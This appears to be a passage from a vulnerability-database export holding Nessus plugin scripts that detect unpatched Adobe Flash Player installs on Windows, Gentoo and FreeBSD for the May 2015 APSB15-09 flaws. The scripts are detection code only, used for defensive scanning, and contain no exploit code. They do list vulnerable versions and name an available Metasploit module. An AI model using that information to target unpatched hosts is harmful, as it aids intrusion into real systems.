\"CVE-2015-3078\",\n \"CVE-2015-3079\",\n \"CVE-2015-3080\",\n \"CVE-2015-3081\",\n \"CVE-2015-3082\",\n \"CVE-2015-3083\",\n \"CVE-2015-3084\",\n \"CVE-2015-3085\",\n \"CVE-2015-3086\",\n \"CVE-2015-3087\",\n \"CVE-2015-3088\",\n \"CVE-2015-3089\",\n \"CVE-2015-3090\",\n \"CVE-2015-3091\",\n \"CVE-2015-3092\",\n \"CVE-2015-3093\"\n );\n script_bugtraq_id(\n 74605,\n 74608,\n 74609,\n 74610,\n 74612,\n 74613,\n 74614,\n 74616,\n 74617\n );\n script_xref(name:\"MSKB\", value:\"3061904\");\n\n script_name(english:\"MS KB3061904: Update for Vulnerabilities in Adobe Flash Player in Internet Explorer\");\n script_summary(english:\"Checks the version of the ActiveX control.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host has a browser plugin installed that is\naffected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing KB3061904. It is, therefore,\naffected by the following vulnerabilities :\n\n - An unspecified security bypass vulnerability exists that\n allows an attacker to disclose sensitive information.\n (CVE-2015-3044)\n\n - Multiple unspecified type confusion flaws exist that\n allow an attacker to execute arbitrary code.\n (CVE-2015-3077, CVE-2015-3084, CVE-2015-3086)\n\n - Multiple memory corruption flaws exist due to improper\n validation of user-supplied input. A remote attacker can\n exploit these flaws, via specially crafted flash\n content, to corrupt memory and execute arbitrary code.\n (CVE-2015-3078, CVE-2015-3089, CVE-2015-3090,\n CVE-2015-3093)\n\n - An unspecified security bypass exists that allows an\n unauthenticated, remote attacker to disclose sensitive\n information. (CVE-2015-3079)\n\n - An unspecified use-after-free error exists that allows\n an attacker to execute arbitrary code. (CVE-2015-3080)\n\n - An unspecified time-of-check time-of-use (TOCTOU) race\n condition exists that allows an attacker to bypass\n Protected Mode for Internet Explorer. (CVE-2015-3081)\n\n - Multiple validation bypass vulnerabilities exist that\n allow an attacker to read and write arbitrary data to\n the file system. (CVE-2015-3082, CVE-2015-3083,\n CVE-2015-3085)\n\n - An integer overflow condition exists due to improper\n validation of user-supplied input. This allows an\n unauthenticated, remote attacker to execute arbitrary\n code. (CVE-2015-3087)\n\n - A heap-based buffer overflow exists due to improper\n validation of user-supplied input. A remote attacker can\n exploit this to execute arbitrary code. (CVE-2015-3088)\n\n - Multiple unspecified memory leaks exist that allow an\n attacker to bypass the Address Space Layout\n Randomization (ASLR) feature. (CVE-2015-3091,\n CVE-2015-3092)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://technet.microsoft.com/library/security/2755801\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/kb/3061904\");\n script_set_attribute(attribute:\"see_also\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb15-09.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Install Microsoft KB3061904.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player ShaderJob Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/05/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/05/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/05/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:adobe:flash_player\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"smb_hotfixes.nasl\");\n script_require_keys(\"SMB/Registry/Enumerated\", \"SMB/WindowsVersion\");\n script_require_ports(139, 445);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_activex_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win8:'0', win81:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\nif (hotfix_check_server_core() == 1) audit(AUDIT_WIN_SERVER_CORE);\n\nif (activex_init() != ACX_OK) audit(AUDIT_FN_FAIL, \"activex_init()\");\n\n# Adobe Flash Player CLSID\nclsid = '{D27CDB6E-AE6D-11cf-96B8-444553540000}';\n\nfile = activex_get_filename(clsid:clsid);\nif (isnull(file))\n{\n activex_end();\n audit(AUDIT_FN_FAIL, \"activex_get_filename\", \"NULL\");\n}\nif (!file)\n{\n activex_end();\n audit(AUDIT_ACTIVEX_NOT_FOUND, clsid);\n}\n\n# Get its version.\nversion = activex_get_fileversion(clsid:clsid);\nif (!version)\n{\n activex_end();\n audit(AUDIT_VER_FAIL, file);\n}\n\ninfo = '';\n\niver = split(version, sep:'.', keep:FALSE);\nfor (i=0; i<max_index(iver); i++)\n iver[i] = int(iver[i]);\n\n# <= 17.0.0.169\nif (\n (report_paranoia > 1 || activex_get_killbit(clsid:clsid) == 0) &&\n (\n iver[0] < 17 ||\n (\n iver[0] == 17 &&\n (\n (iver[1] == 0 && iver[2] == 0 && iver[3] <= 169)\n )\n )\n )\n)\n{\n info = '\\n Path : ' + file +\n '\\n Installed version : ' + version +\n '\\n Fixed version : 17.0.0.188' +\n '\\n';\n}\n\nport = kb_smb_transport();\n\nif (info != '')\n{\n if (report_verbosity > 0)\n {\n if (report_paranoia > 1)\n {\n report = info +\n '\\n' +\n 'Note, though, that Nessus did not check whether the kill bit was\\n' +\n \"set for the control's CLSID because of the Report Paranoia setting\" + '\\n' +\n 'in effect when this scan was run.\\n';\n }\n else\n {\n report = info +\n '\\n' +\n 'Moreover, its kill bit is not set so it is accessible via Internet\\n' +\n 'Explorer.\\n';\n }\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n}\nelse audit(AUDIT_HOST_NOT, 'affected');\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-09-01T23:51:29", "references": ["https://security.gentoo.org/glsa/201505-02"], "pluginID": "83911", "description": "The remote host is affected by the vulnerability described in GLSA-201505-02 (Adobe Flash Player: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in Adobe Flash Player.\n Please review the CVE identifiers referenced below for details.\n Impact :\n\n A remote attacker could possibly execute arbitrary code with the privileges of the process, cause a Denial of Service condition, obtain sensitive information, or bypass security restrictions.\n Workaround :\n\n There is no known workaround at this time.", "edition": 4, "reporter": "Tenable", "published": "2015-06-01T00:00:00", "title": "GLSA-201505-02 : Adobe Flash Player: Multiple vulnerabilities", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Gentoo Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-3079", "CVE-2015-3083", "CVE-2015-3092", "CVE-2015-3090", "CVE-2015-3077", "CVE-2015-3084", "CVE-2015-3080", "CVE-2015-3082", "CVE-2015-3086", "CVE-2015-3044", "CVE-2015-3081", "CVE-2015-3088", "CVE-2015-3085", "CVE-2015-3078", "CVE-2015-3089", "CVE-2015-3087", "CVE-2015-3093", "CVE-2015-3091"], "modified": "2016-05-20T00:00:00", "cpe": ["cpe:/o:gentoo:linux", "p-cpe:/a:gentoo:linux:adobe-flash"], "id": "GENTOO_GLSA-201505-02.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=83911", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 201505-02.\n#\n# The advisory text is Copyright (C) 2001-2016 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(83911);\n script_version(\"$Revision: 2.8 $\");\n script_cvs_date(\"$Date: 2016/05/20 14:03:00 $\");\n\n script_cve_id(\"CVE-2015-3044\", \"CVE-2015-3077\", \"CVE-2015-3078\", \"CVE-2015-3079\", \"CVE-2015-3080\", \"CVE-2015-3081\", \"CVE-2015-3082\", \"CVE-2015-3083\", \"CVE-2015-3084\", \"CVE-2015-3085\", \"CVE-2015-3086\", \"CVE-2015-3087\", \"CVE-2015-3088\", \"CVE-2015-3089\", \"CVE-2015-3090\", \"CVE-2015-3091\", \"CVE-2015-3092\", \"CVE-2015-3093\");\n script_bugtraq_id(74065, 74605, 74608, 74609, 74610, 74612, 74613, 74614, 74616, 74617);\n script_xref(name:\"GLSA\", value:\"201505-02\");\n\n script_name(english:\"GLSA-201505-02 : Adobe Flash Player: Multiple vulnerabilities\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-201505-02\n(Adobe Flash Player: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in Adobe Flash Player.\n Please review the CVE identifiers referenced below for details.\n \nImpact :\n\n A remote attacker could possibly execute arbitrary code with the\n privileges of the process, cause a Denial of Service condition, obtain\n sensitive information, or bypass security restrictions.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/201505-02\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All Adobe Flash Player users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose\n '>=www-plugins/adobe-flash-11.2.202.460'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player ShaderJob Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:adobe-flash\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/05/31\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/06/01\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2016 Tenable Network Security, Inc.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"www-plugins/adobe-flash\", unaffected:make_list(\"ge 11.2.202.460 \"), vulnerable:make_list(\"lt 11.2.202.460 \"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"Adobe Flash Player\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-09-01T23:40:04", "references": ["http://www.nessus.org/u?0cb17c10", "https://helpx.adobe.com/security/products/flash-player/apsb15-09.html"], "pluginID": "83365", "description": "The version of Adobe Flash Player installed on the remote Windows host is equal or prior to version 17.0.0.169. It is, therefore, affected by multiple vulnerabilities :\n\n - An unspecified security bypass vulnerability exists that allows an attacker to disclose sensitive information.\n (CVE-2015-3044)\n\n - Multiple unspecified type confusion flaws exist that allow an attacker to execute arbitrary code.\n (CVE-2015-3077, CVE-2015-3084, CVE-2015-3086)\n\n - Multiple memory corruption flaws exist due to improper validation of user-supplied input. A remote attacker can exploit these flaws, via specially crafted flash content, to corrupt memory and execute arbitrary code.\n (CVE-2015-3078, CVE-2015-3089, CVE-2015-3090, CVE-2015-3093)\n\n - An unspecified security bypass exists that allows a context-dependent attacker to disclose sensitive information. (CVE-2015-3079)\n\n - An unspecified use-after-free error exists that allows an attacker to execute arbitrary code. (CVE-2015-3080)\n\n - An unspecified time-of-check time-of-use (TOCTOU) race condition exists that allows an attacker to bypass Protected Mode for Internet Explorer. (CVE-2015-3081)\n\n - Multiple validation bypass vulnerabilities exist that allow an attacker to read and write arbitrary data to the file system. (CVE-2015-3082, CVE-2015-3083, CVE-2015-3085)\n\n - An integer overflow condition exists due to improper validation of user-supplied input. This allows a context-dependent attacker to execute arbitrary code.\n (CVE-2015-3087)\n\n - A heap-based buffer overflow exists due to improper validation of user-supplied input. A remote attacker can exploit this to execute arbitrary code. (CVE-2015-3088)\n\n - Multiple unspecified memory leaks exist that allow an attacker to bypass the Address Space Layout Randomization (ASLR) feature. (CVE-2015-3091, CVE-2015-3092)", "edition": 6, "reporter": "Tenable", "published": "2015-05-12T00:00:00", "title": "Adobe Flash Player <= 17.0.0.169 Multiple Vulnerabilities (APSB15-09)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Windows", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-3079", "CVE-2015-3083", "CVE-2015-3092", "CVE-2015-3090", "CVE-2015-3077", "CVE-2015-3084", "CVE-2015-3080", "CVE-2015-3082", "CVE-2015-3086", "CVE-2015-3044", "CVE-2015-3081", "CVE-2015-3088", "CVE-2015-3085", "CVE-2015-3078", "CVE-2015-3089", "CVE-2015-3087", "CVE-2015-3093", "CVE-2015-3091"], "modified": "2018-07-11T00:00:00", "cpe": ["cpe:/a:adobe:flash_player"], "id": "FLASH_PLAYER_APSA15-09.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=83365", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(83365);\n script_version(\"1.17\");\n script_cvs_date(\"Date: 2018/07/11 17:09:26\");\n\n script_cve_id(\n \"CVE-2015-3044\",\n \"CVE-2015-3077\",\n \"CVE-2015-3078\",\n \"CVE-2015-3079\",\n \"CVE-2015-3080\",\n \"CVE-2015-3081\",\n \"CVE-2015-3082\",\n \"CVE-2015-3083\",\n \"CVE-2015-3084\",\n \"CVE-2015-3085\",\n \"CVE-2015-3086\",\n \"CVE-2015-3087\",\n \"CVE-2015-3088\",\n \"CVE-2015-3089\",\n \"CVE-2015-3090\",\n \"CVE-2015-3091\",\n \"CVE-2015-3092\",\n \"CVE-2015-3093\"\n );\n script_bugtraq_id(\n 74605,\n 74608,\n 74609,\n 74610,\n 74612,\n 74613,\n 74614,\n 74616,\n 74617\n );\n\n script_name(english:\"Adobe Flash Player <= 17.0.0.169 Multiple Vulnerabilities (APSB15-09)\");\n script_summary(english:\"Checks the version of Flash Player.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host has a browser plugin installed that is\naffected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Adobe Flash Player installed on the remote Windows host\nis equal or prior to version 17.0.0.169. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - An unspecified security bypass vulnerability exists that\n allows an attacker to disclose sensitive information.\n (CVE-2015-3044)\n\n - Multiple unspecified type confusion flaws exist that\n allow an attacker to execute arbitrary code.\n (CVE-2015-3077, CVE-2015-3084, CVE-2015-3086)\n\n - Multiple memory corruption flaws exist due to improper\n validation of user-supplied input. A remote attacker can\n exploit these flaws, via specially crafted flash\n content, to corrupt memory and execute arbitrary code.\n (CVE-2015-3078, CVE-2015-3089, CVE-2015-3090,\n CVE-2015-3093)\n\n - An unspecified security bypass exists that allows a\n context-dependent attacker to disclose sensitive\n information. (CVE-2015-3079)\n\n - An unspecified use-after-free error exists that allows\n an attacker to execute arbitrary code. (CVE-2015-3080)\n\n - An unspecified time-of-check time-of-use (TOCTOU) race\n condition exists that allows an attacker to bypass\n Protected Mode for Internet Explorer. (CVE-2015-3081)\n\n - Multiple validation bypass vulnerabilities exist that\n allow an attacker to read and write arbitrary data to\n the file system. (CVE-2015-3082, CVE-2015-3083,\n CVE-2015-3085)\n\n - An integer overflow condition exists due to improper\n validation of user-supplied input. This allows a\n context-dependent attacker to execute arbitrary code.\n (CVE-2015-3087)\n\n - A heap-based buffer overflow exists due to improper\n validation of user-supplied input. A remote attacker can\n exploit this to execute arbitrary code. (CVE-2015-3088)\n\n - Multiple unspecified memory leaks exist that allow an\n attacker to bypass the Address Space Layout\n Randomization (ASLR) feature. (CVE-2015-3091,\n CVE-2015-3092)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb15-09.html\");\n # http://helpx.adobe.com/flash-player/kb/archived-flash-player-versions.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?0cb17c10\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Adobe Flash Player version 17.0.0.188 or later.\n\nAlternatively, Adobe has made version 13.0.0.289 available for those\ninstallations that cannot be upgraded to 17.x.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player ShaderJob Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/05/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/05/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/05/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:adobe:flash_player\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"flash_player_installed.nasl\");\n script_require_keys(\"SMB/Flash_Player/installed\");\n\n exit(0);\n}\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/Flash_Player/installed\");\n\n# Identify vulnerable versions.\ninfo = \"\";\nvariants = make_list(\n \"Plugin\",\n \"ActiveX\",\n \"Chrome\",\n \"Chrome_Pepper\"\n);\n\n# we're checking for versions less than *or equal to* the cutoff!\nforeach variant (variants)\n{\n vers = get_kb_list(\"SMB/Flash_Player/\"+variant+\"/Version/*\");\n files = get_kb_list(\"SMB/Flash_Player/\"+variant+\"/File/*\");\n\n if(isnull(vers) || isnull(files))\n continue;\n\n foreach key (keys(vers))\n {\n ver = vers[key];\n if(isnull(ver))\n continue;\n\n vuln = FALSE;\n\n # Chrome Flash <= 17.0.0.134\n if(variant == \"Chrome_Pepper\" &&\n ver_compare(ver:ver,fix:\"17.0.0.169\",strict:FALSE) <= 0\n ) vuln = TRUE;\n\n # <= 13.0.0.277\n if(variant != \"Chrome_Pepper\" &&\n ver_compare(ver:ver,fix:\"13.0.0.281\",strict:FALSE) <= 0\n ) vuln = TRUE;\n\n # 14-17 <= 17.0.0.134\n if(variant != \"Chrome_Pepper\" &&\n ver =~ \"^1[4567]\\.\" &&\n ver_compare(ver:ver,fix:\"17.0.0.169\",strict:FALSE) <= 0\n ) vuln = TRUE;\n\n if(vuln)\n {\n num = key - (\"SMB/Flash_Player/\"+variant+\"/Version/\");\n file = files[\"SMB/Flash_Player/\"+variant+\"/File/\"+num];\n if (variant == \"Plugin\")\n {\n info += '\\n Product : Browser plugin (for Firefox / Netscape / Opera)';\n fix = \"17.0.0.188 / 13.0.0.289\";\n }\n else if (variant == \"ActiveX\")\n {\n info += '\\n Product : ActiveX control (for Internet Explorer)';\n fix = \"17.0.0.188 / 13.0.0.289\";\n }\n else if (\"Chrome\" >< variant)\n {\n info += '\\n Product : Browser plugin (for Google Chrome)';\n if(variant == \"Chrome\")\n fix = \"Upgrade to the latest version of Google Chrome.\";\n }\n info += '\\n Path : ' + file +\n '\\n Installed version : ' + ver;\n if (variant == \"Chrome_Pepper\")\n info += '\\n Fixed version : 17.0.0.188 (Chrome PepperFlash)';\n else if(!isnull(fix))\n info += '\\n Fixed version : '+fix;\n info += '\\n';\n }\n }\n}\n\nif (info)\n{\n port = get_kb_item(\"SMB/transport\");\n if (!port) port = 445;\n\n if (report_verbosity > 0) security_hole(port:port, extra:info);\n else security_hole(port);\n}\nelse\n{\n if (thorough_tests)\n exit(0, 'No vulnerable versions of Adobe Flash Player were found.');\n else\n exit(1, 'Google Chrome\\'s built-in Flash Player may not have been detected because the \\'Perform thorough tests\\' setting was not enabled.');\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-09-01T23:41:53", "references": ["http://www.nessus.org/u?9998701d", "https://helpx.adobe.com/security/products/flash-player/apsb15-09.html"], "pluginID": "83442", "description": "Adobe reports :\n\nAdobe has released security updates for Adobe Flash Player for Windows, Macintosh and Linux. These updates address vulnerabilities that could potentially allow an attacker to take control of the affected system. Adobe recommends users update their product installations to the latest versions.\n\nThese updates resolve memory corruption vulnerabilities that could lead to code execution (CVE-2015-3078, CVE-2015-3089, CVE-2015-3090, CVE-2015-3093).\n\nThese updates resolve a heap overflow vulnerability that could lead to code execution (CVE-2015-3088).\n\nThese updates resolve a time-of-check time-of-use (TOCTOU) race condition that could be exploited to bypass Protected Mode in Internet Explorer (CVE-2015-3081).\n\nThese updates resolve validation bypass issues that could be exploited to write arbitrary data to the file system under user permissions (CVE-2015-3082, CVE-2015-3083, CVE-2015-3085).\n\nThese updates resolve an integer overflow vulnerability that could lead to code execution (CVE-2015-3087).\n\nThese updates resolve a type confusion vulnerability that could lead to code execution (CVE-2015-3077, CVE-2015-3084, CVE-2015-3086).\n\nThese updates resolve a use-after-free vulnerability that could lead to code execution (CVE-2015-3080).\n\nThese updates resolve memory leak vulnerabilities that could be used to bypass ASLR (CVE-2015-3091, CVE-2015-3092).\n\nThese updates resolve a security bypass vulnerability that could lead to information disclosure (CVE-2015-3079), and provide additional hardening to protect against CVE-2015-3044.", "edition": 4, "reporter": "Tenable", "published": "2015-05-14T00:00:00", "title": "FreeBSD : Adobe Flash Player -- critical vulnerabilities (e206df57-f97b-11e4-b799-c485083ca99c)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "FreeBSD Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-3079", "CVE-2015-3083", "CVE-2015-3092", "CVE-2015-3090", "CVE-2015-3077", "CVE-2015-3084", "CVE-2015-3080", "CVE-2015-3082", "CVE-2015-3086", "CVE-2015-3044", "CVE-2015-3081", "CVE-2015-3088", "CVE-2015-3085", "CVE-2015-3078", "CVE-2015-3089", "CVE-2015-3087", "CVE-2015-3093", "CVE-2015-3091"], "modified": "2015-07-15T00:00:00", "cpe": ["cpe:/o:freebsd:freebsd", "p-cpe:/a:freebsd:freebsd:linux-f10-flashplugin", "p-cpe:/a:freebsd:freebsd:linux-c6-flashplugin"], "id": "FREEBSD_PKG_E206DF57F97B11E4B799C485083CA99C.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=83442", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2015 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(83442);\n script_version(\"$Revision: 2.10 $\");\n script_cvs_date(\"$Date: 2015/07/15 14:49:03 $\");\n\n script_cve_id(\"CVE-2015-3044\", \"CVE-2015-3077\", \"CVE-2015-3078\", \"CVE-2015-3079\", \"CVE-2015-3080\", \"CVE-2015-3081\", \"CVE-2015-3082\", \"CVE-2015-3083\", \"CVE-2015-3084\", \"CVE-2015-3085\", \"CVE-2015-3086\", \"CVE-2015-3087\", \"CVE-2015-3088\", \"CVE-2015-3089\", \"CVE-2015-3090\", \"CVE-2015-3091\", \"CVE-2015-3092\", \"CVE-2015-3093\");\n\n script_name(english:\"FreeBSD : Adobe Flash Player -- critical vulnerabilities (e206df57-f97b-11e4-b799-c485083ca99c)\");\n script_summary(english:\"Checks for updated packages in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote FreeBSD host is missing one or more security-related\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Adobe reports :\n\nAdobe has released security updates for Adobe Flash Player for\nWindows, Macintosh and Linux. These updates address vulnerabilities\nthat could potentially allow an attacker to take control of the\naffected system. Adobe recommends users update their product\ninstallations to the latest versions.\n\nThese updates resolve memory corruption vulnerabilities that could\nlead to code execution (CVE-2015-3078, CVE-2015-3089, CVE-2015-3090,\nCVE-2015-3093).\n\nThese updates resolve a heap overflow vulnerability that could lead to\ncode execution (CVE-2015-3088).\n\nThese updates resolve a time-of-check time-of-use (TOCTOU) race\ncondition that could be exploited to bypass Protected Mode in Internet\nExplorer (CVE-2015-3081).\n\nThese updates resolve validation bypass issues that could be exploited\nto write arbitrary data to the file system under user permissions\n(CVE-2015-3082, CVE-2015-3083, CVE-2015-3085).\n\nThese updates resolve an integer overflow vulnerability that could\nlead to code execution (CVE-2015-3087).\n\nThese updates resolve a type confusion vulnerability that could lead\nto code execution (CVE-2015-3077, CVE-2015-3084, CVE-2015-3086).\n\nThese updates resolve a use-after-free vulnerability that could lead\nto code execution (CVE-2015-3080).\n\nThese updates resolve memory leak vulnerabilities that could be used\nto bypass ASLR (CVE-2015-3091, CVE-2015-3092).\n\nThese updates resolve a security bypass vulnerability that could lead\nto information disclosure (CVE-2015-3079), and provide additional\nhardening to protect against CVE-2015-3044.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://helpx.adobe.com/security/products/flash-player/apsb15-09.html\"\n );\n # 